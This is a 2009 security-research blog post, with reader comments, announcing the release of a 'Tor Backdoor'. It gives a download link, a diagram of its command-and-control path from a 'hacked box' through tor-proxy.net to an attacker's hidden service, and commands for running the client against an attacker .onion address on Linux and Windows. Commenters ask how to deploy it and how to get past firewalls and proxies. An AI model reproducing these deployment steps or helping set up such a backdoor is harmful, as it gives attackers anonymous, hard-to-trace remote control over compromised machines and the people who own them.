Release of the Tor Backdoor

Sun, 08/09/2009 - 17:08 by Dave Kerb

Hello all,

It took me a week to recover from Vegas, but I am here now, and I am releasing the Tor Backdoor talked about in Vegas. It is a bit rudimentary but it also is very nice if you want to hide.

I hope people find it useful, if nothing else as a place to start for a more robust backdoor.

http://blog.attackresearch.com/publications/metaphish/Alpha_tor_shell.ta...

What this gives you:
1) an encrypted Command and Control channel out of the victim network
2) anonymity, noone knows who is controlling the client
3) cross platform, works on Unix if mono is installed
a) default on Ubuntu/Debian

email me with questions dkerb@attackresearch.com.

Trackback URL for this post:

http://carnal0wnage.attackresearch.com/trackback/376

Comments

Submitted by Anonymous on Thu, 10/22/2009 - 13:51.

WoW it's really implemented

Now this is very hot stuff. I blogged about this a while back:

http://diablohorn.wordpress.com/2008/12/27/untracable-connect-back/

Never thought this would actually end up existing. Very nice work.

DiabloHorn

Submitted by Dave Kerb on Mon, 09/07/2009 - 18:04.

More explanation Finally.

I was supposed to have this out last week, but I have to admit I was avoiding it. I am not much of a writer.

The basic concept of this backdoor is to take advantage of the www.tor-proxy.net service to allow regular HTTP communications into the tor network without the need for tor on the target. Now the server client relationship here is a bit strange, so I am going to try and illustrate using Ascii art.

Client (hacked box)
|
talks over HTTPS
|
V
tor-proxy.net
|
Talks over tor to hidden server
|
V
server (attacker)

The idea being that the connection initiates from the target, through the firewall, to a hidden service that no one can decode the location to. This give a very high level of anonymity to the attacker.

What this needs to run:

On Windows .net framework 1.1, and if you are running the server on windows(the attacker side), you will also need tor set up for a hidden service.

On Linux you need mono, at least on one machine. If the target doesn't have mono, please read up on mkbundle2, which will make a binary that doesn't require mono, but is big. Depending on your setup, you may need to run:
mono ./tor_client.....

This should work on mac, but I don't have one to easily test with.

Running tor_client

I am assuming that all the server is setup correctly, and for this example, your tor service name is evilhash.onion.

On linux:

mono ./Tor_Client.exe http://evilhash.onion
-or of mono is set up to run .net automatically-
./Tor_Client.exe http://evilhash.onion

On Windows :

Tor_Client.exe http://evilhash.onion

The Traffic that is going to tor-proxy.net at this point is all encrypted, and if someone were able to break the encryption, or tor-proxy.net was monitoring, they would see requests similar to:

http://tor-proxy.net/proxy/tor/browse.php?u=http%3A%2F%2Fevilhash.onion%...

Running the Server

This is where the attacker will type commands, and output will come back. Just run the Tor_Server command with no argument.

Hope this helps some. I will try and be more responsive in the future.

Submitted by Anonymous on Fri, 08/28/2009 - 08:12.

Testing

I tested it with windows and works really incredible. You did a good job! now I want to try it with debian.
Thank you for all

Submitted by Dave Kerb on Wed, 08/26/2009 - 20:35.

Little more detailed post this weekend

So You definitely need Mono. This is installed on ubuntu and most newer debians. I will have some better build instructions this weekend. I did test on a couple different ubuntu versions, and windows with .net installed, and it worked well. I didn't try debian. You might want to try apt-get install mono, and then trying running 'mono server'.

I will have more this weekend.

Submitted by Anonymous on Tue, 02/23/2010 - 23:33.

proxy

Would this be https connection from the victims machine using his browser, suppose not? Just thinking in a scenario where the victim might reside behind firewall and proxy server onsite. Firewall will block the user's https request but the proxy will be allowed (normally).

Submitted by Anonymous on Wed, 08/26/2009 - 05:46.

John

hehehe, I'm also sure that he tested it! but I can't use it... do you know how can I execute it in debian? I have tor installed but I don't know if I need something else...

Submitted by Anonymous on Wed, 08/26/2009 - 05:44.

John

Or course! but I cant use it. Do you know how can the server work in debian? How can I execute it?

tahnks

Submitted by cg on Tue, 08/25/2009 - 21:17.

I'm pretty sure Dave has

I'm pretty sure Dave has tested it extensively :-)

Submitted by Anonymous on Tue, 08/25/2009 - 02:54.

Testing

Someone hast test this backdoor? It´s really work?because then it could be really interesting

User login

Navigation

Trackbacks

The Assagai phishing framework: teaser
38 weeks 3 days ago
Securing over the top - in depth vs. just sketchy
39 weeks 17 hours ago

Blogs

[ Metasploit ]
[ g0ne ]
[ Laramies Corner ]
[ MC ]
[ pentest monkey.net ]
[ SIPVicious ]
[ The Cover of Night ]
[ TS/SCI Security ]
[ Washington Post Sec Fix ]

Links

[ Metasploit ]
[ zero(day)solutions ]
[ EthicalHacker.net ]
[ LearnSecurityOnline ]